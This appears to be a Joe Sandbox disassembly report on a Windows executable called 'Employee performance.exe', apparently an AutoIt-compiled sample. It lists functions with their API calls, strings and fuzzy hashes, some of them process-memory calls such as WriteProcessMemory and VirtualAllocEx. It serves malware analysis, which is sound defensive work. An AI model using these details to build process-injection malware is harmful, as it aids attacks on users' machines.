Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ad41875d348bba799d1805ece5dd293cc6c63057faeaa079ce7da1cd811b51ae
Instruction ID: 396d908ff5f4fc8ae7937ae9eb16e772be6cc4d84830bd91f7b0d4b7929d4d85
Opcode Fuzzy Hash: ad41875d348bba799d1805ece5dd293cc6c63057faeaa079ce7da1cd811b51ae
Instruction Fuzzy Hash: CDF04935200341BBEB214FA99D49F563BADEF8A662F104454FAC9DA251CA76D8108B60

Function 01031014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0103102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01031036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01031045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0103104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01031062

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1b9077efb2227d94faec400e19aa2d38db1c38fe1b0c5158f741234218a60f77
Instruction ID: 9e6b4fa086793339a1ba018988787ec70aeb03f84117966cf0471f93be304469
Opcode Fuzzy Hash: 1b9077efb2227d94faec400e19aa2d38db1c38fe1b0c5158f741234218a60f77
Instruction Fuzzy Hash: E0F06D35200341FBEB225FA9ED59F563FADEF8A661F100414FAC5DB250CA76D9108B60

Function 0104030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 01040324
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 01040331
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 0104033E
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 0104034B
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 01040358
CloseHandle.KERNEL32(?,?,?,?,0104017D,?,010432FC,?,00000001,01012592,?), ref: 01040365

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 92a05e3d824efbee831f4b83a2dffa55ec32cc566087c35a8f4439b1a301a66a
Instruction ID: 056dc06c431a820420c97f204e677766cc4a433bfb92e0e2334386b5c1737e78
Opcode Fuzzy Hash: 92a05e3d824efbee831f4b83a2dffa55ec32cc566087c35a8f4439b1a301a66a
Instruction Fuzzy Hash: EC0190B2800B159FD7309F6AD8D0453FBF9BE502163158A7EE2D662931C371A954CF80

Function 0100D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0100D752

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

_free.LIBCMT ref: 0100D764
_free.LIBCMT ref: 0100D776
_free.LIBCMT ref: 0100D788
_free.LIBCMT ref: 0100D79A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: abe2ef2ada87b5bae677b3f55b2ae478493600a0c00318a2e9188b9fbe65952c
Instruction ID: bc40eab9865ff904bad744165a532fb7aecea3dcdf80ed7554014acf9dd628fb
Opcode Fuzzy Hash: abe2ef2ada87b5bae677b3f55b2ae478493600a0c00318a2e9188b9fbe65952c
Instruction Fuzzy Hash: B9F068325442456BB663EBDCF6C8C5A7BDDBB44250BA40849F1CCD7584D735F8404770

Function 01035C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 01035C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 01035C6F
MessageBeep.USER32(00000000), ref: 01035C87
KillTimer.USER32(?,0000040A), ref: 01035CA3
EndDialog.USER32(?,00000001), ref: 01035CBD

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: cd2b9ce00b65c590cd1b25de5e6c4b9747363dacffa5d781dc046b413bee533f
Instruction ID: cea320f515a5e58c4dacb680960b0b296b436d7f3e9edcbc5e36584ef83e5503
Opcode Fuzzy Hash: cd2b9ce00b65c590cd1b25de5e6c4b9747363dacffa5d781dc046b413bee533f
Instruction Fuzzy Hash: D50144305107089EFB315B14DE4EF957BB8BB44705F04065AF6C2A14F1D7F9A9448B54

Function 010022A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 010022BE

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

_free.LIBCMT ref: 010022D0
_free.LIBCMT ref: 010022E3
_free.LIBCMT ref: 010022F4
_free.LIBCMT ref: 01002305

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bc86839db29370a578c9f647970b28302a827c29ff0319b7888c41255ac2f052
Instruction ID: 9fdfb9676263031bb9c3bdd0dc48228cade4e1e919ad1e26cb5b6954796559e1
Opcode Fuzzy Hash: bc86839db29370a578c9f647970b28302a827c29ff0319b7888c41255ac2f052
Instruction Fuzzy Hash: 3EF054B48109159BA623BF54F40488D3FA8F7287A0B900506F4D0D72ECC73B4421AFE4

Function 00FE95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00FE95D4
StrokeAndFillPath.GDI32(?,?,010271F7,00000000,?,?,?), ref: 00FE95F0
SelectObject.GDI32(?,00000000), ref: 00FE9603
DeleteObject.GDI32 ref: 00FE9616
StrokePath.GDI32(?), ref: 00FE9631

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 5f479076ceb87555f4fa9b6fc8965bdc9a20f946edb592ab379e56b4d717c092
Instruction ID: e1755e48c7337cab9367514b5f2128e4a0103f7321d2a09d4b97c6ae42db286e
Opcode Fuzzy Hash: 5f479076ceb87555f4fa9b6fc8965bdc9a20f946edb592ab379e56b4d717c092
Instruction Fuzzy Hash: 00F04F31409B44EBEB365F66EA0C7643FA1BB41372F448215F4E5550F8CB7A8995EF20

Function 01000F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 010010F9
__freea.LIBCMT ref: 01001117

Part of subcall function 01001537: _free.LIBCMT ref: 0100154F

Strings

am/pm, xrefs: 0100117A
a/p, xrefs: 010011DE

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 6f541605b23087880b22fab27844b9a76a78accd74b6d1681ec0924a98bfa1aa
Instruction ID: f44125d8433acb120f5964c768cf7d8983704f86b1268c186b3e493bfcdfb97c
Opcode Fuzzy Hash: 6f541605b23087880b22fab27844b9a76a78accd74b6d1681ec0924a98bfa1aa
Instruction Fuzzy Hash: 67D1BE71A042069AFB6B8F6CC855BFEBBF1EF05300F188199E6819B6D1D275D980CB91

Function 01057B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00FF0242: EnterCriticalSection.KERNEL32(010A070C,010A1884,?,?,00FE198B,010A2518,?,?,?,00FD12F9,00000000), ref: 00FF024D
Part of subcall function 00FF0242: LeaveCriticalSection.KERNEL32(010A070C,?,00FE198B,010A2518,?,?,?,00FD12F9,00000000), ref: 00FF028A

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 00FF00A3: __onexit.LIBCMT ref: 00FF00A9

__Init_thread_footer.LIBCMT ref: 01057BFB

Part of subcall function 00FF01F8: EnterCriticalSection.KERNEL32(010A070C,?,?,00FE8747,010A2514), ref: 00FF0202
Part of subcall function 00FF01F8: LeaveCriticalSection.KERNEL32(010A070C,?,00FE8747,010A2514), ref: 00FF0235

Strings

5, xrefs: 01057C78
Variable must be of type 'Object'., xrefs: 01057C3A
G, xrefs: 01057C7F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 88f9eb94f02c2819581ce34b33d8655f7370b026ac5a1675f25c4c1e764d8a86
Instruction ID: d365023e0c32f3ef8ef446abaa21135ebb2f2a24c61fe3e69b26095c28346ec3
Opcode Fuzzy Hash: 88f9eb94f02c2819581ce34b33d8655f7370b026ac5a1675f25c4c1e764d8a86
Instruction Fuzzy Hash: 46917F71600209EFCB55EF58C890DAEBBB5FF44304F848099FD865B251DB71AE41EB61

Function 01032716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0103B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010321D0,?,?,00000034,00000800,?,00000034), ref: 0103B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01032760

Part of subcall function 0103B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010321FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0103B3F8

Part of subcall function 0103B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0103B355
Part of subcall function 0103B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01032194,00000034,?,?,00001004,00000000,00000000), ref: 0103B365
Part of subcall function 0103B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01032194,00000034,?,?,00001004,00000000,00000000), ref: 0103B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010327CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0103281A

Strings

@, xrefs: 01032832

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 920bd8b56dcc2f17cd12a1665db2255b62c7906a83fb97004d79f7c411e09982
Instruction ID: f2b6dfaed21bc8351415eafdbf9339b28d2fed532b667d4e23cf18be922c04d0
Opcode Fuzzy Hash: 920bd8b56dcc2f17cd12a1665db2255b62c7906a83fb97004d79f7c411e09982
Instruction Fuzzy Hash: 5F416D72901219BFDB10DFA8CD41AEEBBB8FF59700F108095FA95B7180DA706E45CBA0

Function 0100172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Employee performance.exe,00000104), ref: 01001769
_free.LIBCMT ref: 01001834
_free.LIBCMT ref: 0100183E

Strings

C:\Users\user\Desktop\Employee performance.exe, xrefs: 01001760, 01001767, 01001796, 010017CE

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Employee performance.exe
API String ID: 2506810119-487908856
Opcode ID: 85ddf2a9fa23333f59e3796cdc55fc252d06e52e05a53a518a39ada10cb9b780
Instruction ID: 0ae9d72dab94fe3a2f2f71bdc65e49a1f49b113be1ae033bf2b9662af69ccc05
Opcode Fuzzy Hash: 85ddf2a9fa23333f59e3796cdc55fc252d06e52e05a53a518a39ada10cb9b780
Instruction Fuzzy Hash: 27318E75A00219EBEB23DF99D884D9EBBFCEF85310F5041A6E98497280D670CB40CBA0

Function 0103C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0103C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0103C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,010A1990,01654DD8), ref: 0103C395

Strings

0, xrefs: 0103C2DF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 5f507a9d637fa45a31fe8c60af18002d7e3ee1ccf627ecb5ef31477dcdcd8abe
Instruction ID: f46e54a31937358d03f83672d91f658be7e52e062cf534991959dd7b07fce41e
Opcode Fuzzy Hash: 5f507a9d637fa45a31fe8c60af18002d7e3ee1ccf627ecb5ef31477dcdcd8abe
Instruction Fuzzy Hash: E141A0712043029FE720DF29D984B6ABBE8AFC5314F048A5EF9E5E72D1D770A604CB52

Function 01064416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0106CC08,00000000,?,?,?,?), ref: 010644AA
GetWindowLongW.USER32 ref: 010644C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 010644D7

Strings

SysTreeView32, xrefs: 0106447C

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: b4d832829f2de29fe8c7e9d74352ff684e9e021f8d798e25c424fce13194700e
Instruction ID: e0227e0e1a33062277b9d3db5013e92a8bbb4b97d1f10fb40eef2cedd94dd10a
Opcode Fuzzy Hash: b4d832829f2de29fe8c7e9d74352ff684e9e021f8d798e25c424fce13194700e
Instruction Fuzzy Hash: 1431BE31210205AFEF618E38DC46BEA7BA9EB09334F204315FAB5D21E1DB75E8509B50

Function 0105304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0105335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,01053077,?,?), ref: 01053378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0105307A
_wcslen.LIBCMT ref: 0105309B
htons.WSOCK32(00000000,?,?,00000000), ref: 01053106

Strings

255.255.255.255, xrefs: 01053095, 0105309A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 3fd0965c221f272659a135bbf1a14d568d732911d2a7e2b221a2702ae5e2cdf7
Instruction ID: 670689795425671ee86a26f7ef4e6ea6c42dbb4d0222804338714e3b12eff829
Opcode Fuzzy Hash: 3fd0965c221f272659a135bbf1a14d568d732911d2a7e2b221a2702ae5e2cdf7
Instruction Fuzzy Hash: 2831EF392002058FDBA0CF68C491AABBBF0FF04398F149099E9958F392CB72ED41C760

Function 01064653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01064705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01064713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0106471A

Strings

msctls_updown32, xrefs: 01064684

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: c8796536ec0b657a5829c67a27c63488159c2d9a62bf1d52f2c8205277aa9f76
Instruction ID: 24abfaa8ae673d35bd1d976ca60d3ca9446f96f679ff8a67d5f3fceea33b59ff
Opcode Fuzzy Hash: c8796536ec0b657a5829c67a27c63488159c2d9a62bf1d52f2c8205277aa9f76
Instruction Fuzzy Hash: 24215CB5600209AFEB11DF68DC81DAB37EDEB5A3A4B04005AFA80DB251CB75EC11DB60

Function 010395AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0103961D

Strings

#notrayicon, xrefs: 010395B7
#OnAutoItStartRegister, xrefs: 010395F3
#requireadmin, xrefs: 010395D9

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: a8c8409efe55efdcaf745b9dc179c5ef1ab3a94017b346ea7a85827fb3fd5c22
Instruction ID: a4988b5e49ec4e295fb887d3105ba4d8889b9d2032ea47a7df659cf72f895b21
Opcode Fuzzy Hash: a8c8409efe55efdcaf745b9dc179c5ef1ab3a94017b346ea7a85827fb3fd5c22
Instruction Fuzzy Hash: D3218B3220461166D331BB299C12FBB73DC9FD5308F04402AFACA9B182EBD5A981D391

Function 010637B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01063840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01063850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01063876

Strings

Listbox, xrefs: 0106380F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
